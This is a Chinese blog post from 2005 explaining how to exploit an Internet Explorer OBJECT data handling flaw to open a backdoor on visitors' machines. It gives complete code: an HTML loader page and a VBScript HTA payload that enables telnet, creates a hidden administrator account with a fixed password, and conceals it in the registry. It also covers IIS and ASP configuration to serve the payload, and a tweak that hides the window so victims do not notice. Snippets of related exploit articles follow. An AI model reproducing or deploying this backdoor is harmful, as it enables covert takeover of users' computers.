利用IE Object Data 远程执行漏洞开后门

原创 2005年04月28日 21:56:00
 11

        由于IE处理对象标记 OBJECT 的 DATA 标签时没有正确处理要被装载的文件参数,当"OBJECT"标记中用于设置对象的MIME类型的"Type"属性不为空时,IE会根据标记中的"Type"值装载文件,此时若控件不安全则IE会提示是否执行,但当"Type"属性为空时,IE会根据服务器返回的 HTTP 头中的 Content-Type 来处理数据,此时却没有充分检查被装载的文件属性,也就是说如果服务器返回的HTTP头中的 Content-Type 是 application/hta 等,那么脚本就会绕过安全区域限制而能够执行。

        可以通过此漏洞开放机器的telnet服务器,并且在服务器上面添加一个admin用户,密码是myadmin,代码由两个文件组成,一个是html文件,因为html不能直接执行代码,html用于使tt文件的代码执行。代码如下:

index.htm 文件代码:

<html>
<head><title></title>
</head>
<body>
利用“IE Object Data 远程执行漏洞”添加用户并打开系统的telnet服务
<object data="backdoor.tt"></object>
</body></html>
 

backdoor.tt 文件代码:

<html>
<head>
<title></title>
<script language="VBScript">
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
set ws=CreateObject("WScript.Shell")
ws.run"%Systemroot%/system32/sc.exe config tlntsvr start= auto",0
ws.run"%Systemroot%/system32/tlntadmn.exe start",0
ws.run"%Systemroot%/system32/net.exe user admin myadmin /add",0
ws.run"%Systemroot%/system32/net.exe localgroup administrators admin /add",0
ws.run"%Systemroot%/system32/reg.exe add ""HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList"" /v admin /t REG_DWORD /d 0x0",0
</script>
<body></body>
</html>
 


单单把代码放到服务器上面是不能够直接执行的,因为tt文件的返回类型不是application/hta,即使后缀改为.hta也不行,必须要进行iis服务器设置,可以在iis添加mime类型就可以了。步骤如下:1。打开iis网站的属性。2。选择http头标签。3。选择mime类型。4。新建一个类型对应,在扩展名上写.tt,在mime类型里面写application/hta。确定后应用就可以生效。

改进1:
用上面的代码所产生的结果会在ie弹出一个窗口,使人怀疑是否中毒,可以通过修改backdoor.tt的代码,使窗口不弹出来,方法很简单,在<html>标签后面加上如下语句<HTA:APPLICATION caption="no" border="none" windowState="minimize" visiable="no" showintaskbar="no">,然后在执行完</script>前加上Window.Close()这样窗口就基本上相当于隐藏了。
改进2:
上面的要通过设置iis服务器,可以通过asp发送文件头的方式使ie认为asp文件是aplication/hta类型文件,这样就可以执行代码了。方法如下:将backdoor.tt改为backdoor.asp,在backdoor.asp的最开始加上如下语句<%response.ContentType="application/hta"%>。相对应的,index.htm文件也要将backdoor.tt修改为backdoor.asp。

最新IE远程代码执行漏洞分析

漏洞信息 Internet Explorer 在打开攻击页面时,CMshtmlEd 对象被删除并释放,且释放后的内存被重用,导致 Use-After-Free. 受影响系统: Microsoft...

WordPress-Mailpress远程代码执行漏洞——利用

相关资料: http://www.jeeseen.com/archives/421.html http://www.xingkonglangzi.com/post-662.html ht...
  • zjnuwsf
  • zjnuwsf
  • 2017年05月12日 14:09
  • 718

Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路

今日爆出一个Bash的RCE漏洞,威力巨大。看了看老外的分析,觉得有必要写一写自己对这个漏洞的理解。 首先,问题起因于一个命令ENV。 原型: env [OPTION]... [NAME=VALU...

PHP168 V6.02 整站系统远程执行任意代码漏洞利用

漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数. inc/function.inc.php: function get_html_url(){ ...
  • god_7z1
  • god_7z1
  • 2011年08月13日 14:47
  • 372

Strust2远程代码执行漏洞(S2-033)利用分析

5月12日,Struts官方发布安全公告称,Apache Strut2 REST插件存在漏洞,可以远程执行任意指令,该漏洞编号为S2-033(CVE-2016-3087 ),公告详情如下: 启...

安卓WebView中接口隐患(远程代码执行漏洞)与手机挂马利用

0×00 背景 在android的sdk中封装了webView控件。这个控件主要用开控制的网页浏览。在程序中装载webView控件,可以设置属性(颜色,字体等)。类似PC下directUI的功能。在...

linux bash远程执行代码漏洞的补丁

  • 2014年10月20日 12:41
  • 8.64MB
  • 下载

重大漏洞!PHP multipart/form-data头部解析远程拒绝服务漏洞

"有些人看不懂,简单比喻来说吧:目前刚出的任何安全防护都不会拦,网站类专属漏洞 畸形数据包,2KB随机数据包,2M网速打死各种网站,cdn通挂!"PHP multipart/form-dat...
  • h4ck0ne
  • h4ck0ne
  • 2016年01月23日 17:45
  • 707
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:利用IE Object Data 远程执行漏洞开后门
举报原因:
原因补充:

(最多只允许输入30个字)